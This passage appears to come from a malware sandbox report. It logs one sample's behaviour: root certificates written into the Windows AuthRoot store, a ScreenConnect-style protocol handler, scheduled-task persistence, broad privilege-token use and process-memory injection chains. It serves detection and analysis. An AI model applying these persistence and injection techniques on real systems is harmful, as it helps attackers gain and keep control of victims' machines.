Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command	msiexec.exe

Modifies system certificate store 2 TTPs 10 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	7aencsM.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	futors.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	futors.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	futors.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	db484a9c5c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	2b8d02974d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	db484a9c5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	2b8d02974d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	2b8d02974d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	7aencsM.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2856	schtasks.exe
2284	schtasks.exe
3440	schtasks.exe
3424	schtasks.exe
2672	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2392	apisysDirectx.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2808	skotes.exe
2280	MAl7pjE.exe
2280	MAl7pjE.exe
2280	MAl7pjE.exe
2280	MAl7pjE.exe
2280	MAl7pjE.exe
680	sQ3DZPU.exe
2492	powershell.exe
1392	msiexec.exe
1392	msiexec.exe
2492	powershell.exe
2492	powershell.exe
1620	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
2044	powershell.exe
2484	powershell.exe
1620	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
1620	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
2912	powershell.exe
2504	52206648a6.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
2376	powershell.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
272	f29907a492.exe
272	f29907a492.exe
2376	powershell.exe
2376	powershell.exe
1744	483d2fa8a0d53818306efeb32d3.exe
2292	db484a9c5c.exe
2292	db484a9c5c.exe
2292	db484a9c5c.exe
2292	db484a9c5c.exe
2292	db484a9c5c.exe
2984	DTQCxXZ.exe
2984	DTQCxXZ.exe
2984	DTQCxXZ.exe
2984	DTQCxXZ.exe
988	monthdragon.exe
988	monthdragon.exe
988	monthdragon.exe
988	monthdragon.exe
2548	Bjkm5hE.exe
2548	Bjkm5hE.exe
2548	Bjkm5hE.exe
2548	Bjkm5hE.exe
1628	f3Ypd8O.exe
1628	f3Ypd8O.exe
1628	f3Ypd8O.exe
1628	f3Ypd8O.exe
816	MAl7pjE.exe
816	MAl7pjE.exe
816	MAl7pjE.exe
816	MAl7pjE.exe
816	MAl7pjE.exe
1464	aca90f55db.exe
1464	aca90f55db.exe
1464	aca90f55db.exe
1464	aca90f55db.exe
1464	aca90f55db.exe
1572	NL58452.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1032	a1EoH8b.exe
Token: SeDebugPrivilege	680	sQ3DZPU.exe
Token: SeShutdownPrivilege	1732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1392	msiexec.exe
Token: SeTakeOwnershipPrivilege	1392	msiexec.exe
Token: SeSecurityPrivilege	1392	msiexec.exe
Token: SeCreateTokenPrivilege	1732	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1732	msiexec.exe
Token: SeLockMemoryPrivilege	1732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1732	msiexec.exe
Token: SeMachineAccountPrivilege	1732	msiexec.exe
Token: SeTcbPrivilege	1732	msiexec.exe
Token: SeSecurityPrivilege	1732	msiexec.exe
Token: SeTakeOwnershipPrivilege	1732	msiexec.exe
Token: SeLoadDriverPrivilege	1732	msiexec.exe
Token: SeSystemProfilePrivilege	1732	msiexec.exe
Token: SeSystemtimePrivilege	1732	msiexec.exe
Token: SeProfSingleProcessPrivilege	1732	msiexec.exe
Token: SeIncBasePriorityPrivilege	1732	msiexec.exe
Token: SeCreatePagefilePrivilege	1732	msiexec.exe
Token: SeCreatePermanentPrivilege	1732	msiexec.exe
Token: SeBackupPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1732	msiexec.exe
Token: SeShutdownPrivilege	1732	msiexec.exe
Token: SeDebugPrivilege	1732	msiexec.exe
Token: SeAuditPrivilege	1732	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1732	msiexec.exe
Token: SeChangeNotifyPrivilege	1732	msiexec.exe
Token: SeRemoteShutdownPrivilege	1732	msiexec.exe
Token: SeUndockPrivilege	1732	msiexec.exe
Token: SeSyncAgentPrivilege	1732	msiexec.exe
Token: SeEnableDelegationPrivilege	1732	msiexec.exe
Token: SeManageVolumePrivilege	1732	msiexec.exe
Token: SeImpersonatePrivilege	1732	msiexec.exe
Token: SeCreateGlobalPrivilege	1732	msiexec.exe
Token: SeCreateTokenPrivilege	1732	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1732	msiexec.exe
Token: SeLockMemoryPrivilege	1732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1732	msiexec.exe
Token: SeMachineAccountPrivilege	1732	msiexec.exe
Token: SeTcbPrivilege	1732	msiexec.exe
Token: SeSecurityPrivilege	1732	msiexec.exe
Token: SeTakeOwnershipPrivilege	1732	msiexec.exe
Token: SeLoadDriverPrivilege	1732	msiexec.exe
Token: SeSystemProfilePrivilege	1732	msiexec.exe
Token: SeSystemtimePrivilege	1732	msiexec.exe
Token: SeProfSingleProcessPrivilege	1732	msiexec.exe
Token: SeIncBasePriorityPrivilege	1732	msiexec.exe
Token: SeCreatePagefilePrivilege	1732	msiexec.exe
Token: SeCreatePermanentPrivilege	1732	msiexec.exe
Token: SeBackupPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1732	msiexec.exe
Token: SeShutdownPrivilege	1732	msiexec.exe
Token: SeDebugPrivilege	1732	msiexec.exe
Token: SeAuditPrivilege	1732	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1732	msiexec.exe
Token: SeChangeNotifyPrivilege	1732	msiexec.exe
Token: SeRemoteShutdownPrivilege	1732	msiexec.exe
Token: SeUndockPrivilege	1732	msiexec.exe
Token: SeSyncAgentPrivilege	1732	msiexec.exe
Token: SeEnableDelegationPrivilege	1732	msiexec.exe
Token: SeManageVolumePrivilege	1732	msiexec.exe
Token: SeImpersonatePrivilege	1732	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
1732	msiexec.exe
1796	7be12f2342.exe
1796	7be12f2342.exe
1796	7be12f2342.exe
1732	msiexec.exe
2492	amnew.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
1740	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe
3756	chrome.exe

Suspicious use of SendNotifyMessage 19 IoCs

pid	Process
1796	7be12f2342.exe
1796	7be12f2342.exe
1796	7be12f2342.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
3120	cd7bf9405c.exe
3120	cd7bf9405c.exe
3120	cd7bf9405c.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe
1872	firefox.exe
1872	firefox.exe
1872	firefox.exe
4068	c139e4b71c.exe
4068	c139e4b71c.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2808	2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	30
PID 2108 wrote to memory of 2808	2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	30
PID 2108 wrote to memory of 2808	2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	30
PID 2108 wrote to memory of 2808	2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	30
PID 2808 wrote to memory of 680	2808	skotes.exe	32
PID 2808 wrote to memory of 680	2808	skotes.exe	32
PID 2808 wrote to memory of 680	2808	skotes.exe	32
PID 2808 wrote to memory of 680	2808	skotes.exe	32
PID 2808 wrote to memory of 1032	2808	skotes.exe	34
PID 2808 wrote to memory of 1032	2808	skotes.exe	34
PID 2808 wrote to memory of 1032	2808	skotes.exe	34
PID 2808 wrote to memory of 1032	2808	skotes.exe	34
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1032 wrote to memory of 1732	1032	a1EoH8b.exe	35
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1392 wrote to memory of 1936	1392	msiexec.exe	37
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 1936 wrote to memory of 596	1936	MsiExec.exe	38
PID 2808 wrote to memory of 2280	2808	skotes.exe	41
PID 2808 wrote to memory of 2280	2808	skotes.exe	41
PID 2808 wrote to memory of 2280	2808	skotes.exe	41
PID 2808 wrote to memory of 2280	2808	skotes.exe	41
PID 2808 wrote to memory of 1796	2808	skotes.exe	44
PID 2808 wrote to memory of 1796	2808	skotes.exe	44
